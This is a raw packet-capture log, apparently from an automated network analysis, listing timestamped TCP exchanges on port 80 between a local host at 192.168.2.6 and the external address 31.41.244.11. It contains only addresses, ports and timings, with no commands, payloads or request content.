                                                                                                                                                              Dec 18, 2024 11:47:17.723171949 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.723262072 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.723303080 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.724308014 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.724447966 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.724484921 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.725534916 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.725761890 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.725800037 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.726733923 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.726785898 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.726846933 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.727822065 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.727859974 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.727936029 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.729006052 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.729042053 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.729094982 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.730150938 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.730191946 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.730287075 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.730320930 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.731409073 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.731421947 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.731461048 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.731487989 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.732501984 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.732646942 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.732681036 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.733737946 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.733786106 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.733814001 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.734213114 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.735008955 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.735084057 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.735124111 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.736109018 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.736433029 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.736457109 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.736468077 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.737185001 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.737297058 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.737333059 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.738337040 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.738449097 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.738485098 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.739506006 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.739610910 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.739653111 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.740690947 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.740745068 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.740777969 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.741862059 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.741983891 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.742019892 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.743030071 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.743078947 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.743206978 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.744225025 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.744283915 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.744292021 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.744376898 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.745400906 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.745445013 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.745449066 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.746196032 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.746496916 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.747054100 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.876024008 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.876065969 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.876152039 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.876538038 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.876827002 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.876871109 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.876894951 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.878020048 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.878032923 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.878060102 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.878077030 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.879198074 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.879435062 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.879961967 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.879996061 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.880486012 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.880500078 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.880520105 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.880533934 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.881910086 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.881922960 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.881961107 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.882828951 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.882925987 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.882968903 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.883898973 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.883912086 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.883965015 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.885052919 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.885066032 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.885108948 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.886214972 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.886226892 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.886272907 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.887463093 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.887762070 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.887804031 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.888529062 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.888541937 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.888577938 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.889745951 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.889921904 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.889966965 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.890872002 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.890912056 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.891159058 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.891191006 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.892040014 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.892262936 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.892416954 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.892458916 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.893212080 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.893249035 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.893419981 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.893639088 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.894362926 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.894445896 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.894476891 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.894602060 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.895541906 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.895637035 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.895648003 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.895668030 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.896740913 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.896754980 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.896790981 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.896809101 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.897861004 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.897902012 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.897942066 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.898201942 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.899096012 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.899135113 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.899364948 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.899425983 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.900198936 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.900240898 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.900327921 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.900362015 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.901412964 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.901454926 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.901654005 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.901688099 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.902596951 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.902610064 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.902643919 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.902656078 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.903717995 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.903759956 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.904021978 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.904061079 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.904936075 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.904948950 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.904973030 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.904998064 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.906049967 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.906086922 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.906327009 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.906363964 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.907241106 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.907279015 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.907418013 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.907454967 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.908406019 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.908447981 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.908524990 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.908557892 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.909674883 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.909718037 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.909768105 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.909801960 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.910752058 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.910778046 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.910793066 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.910821915 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.912002087 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.912044048 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.912555933 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.912596941 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.913217068 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.913229942 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.913254023 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.913280010 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.914307117 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.914350033 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.915467978 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.915483952 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.915496111 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.915509939 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.915530920 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.916615963 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.916654110 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.916863918 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.916898012 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.917756081 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.917794943 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.918056011 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.918091059 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.918992996 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.919006109 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.919029951 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.919044018 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.920171976 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.920186043 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.920212984 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.920239925 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.921282053 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.921308041 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.921319962 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.921346903 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.922450066 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.922488928 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.922517061 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.922549963 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.923618078 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.923634052 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.923651934 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.923669100 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.924808979 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.924849987 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.925374985 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.925415993 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.925951958 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.925987959 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.926136971 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.926172018 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.927098989 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.927136898 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.928256035 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.928292036 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.928317070 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.928328037 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.928348064 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.928366899 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.929472923 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.929486990 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.929510117 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.929526091 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.930602074 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.930661917 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.931195974 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.931252003 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.931807041 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.931843042 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.931902885 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.931930065 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.932936907 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.932974100 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.933618069 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.933655024 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.934156895 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.934199095 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.934283972 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.934319019 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.935305119 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.935327053 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.935343981 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.935365915 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.936475992 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.936506033 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.937436104 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.937469959 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.067848921 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.067897081 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.068111897 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.068152905 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.068505049 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.068553925 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.068682909 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.068718910 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.069561005 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.069575071 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.069605112 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.069626093 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.071289062 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.071346045 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.071438074 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.071475029 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.072204113 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.072243929 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.072318077 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.072350979 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.073029041 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.073041916 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.073064089 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.073075056 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.073719025 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.073755026 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.073827982 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.073863029 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.074790955 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.074965000 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.075647116 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.075690985 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.075982094 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.075994968 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.076021910 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.076039076 CET4980680192.168.2.631.41.244.11
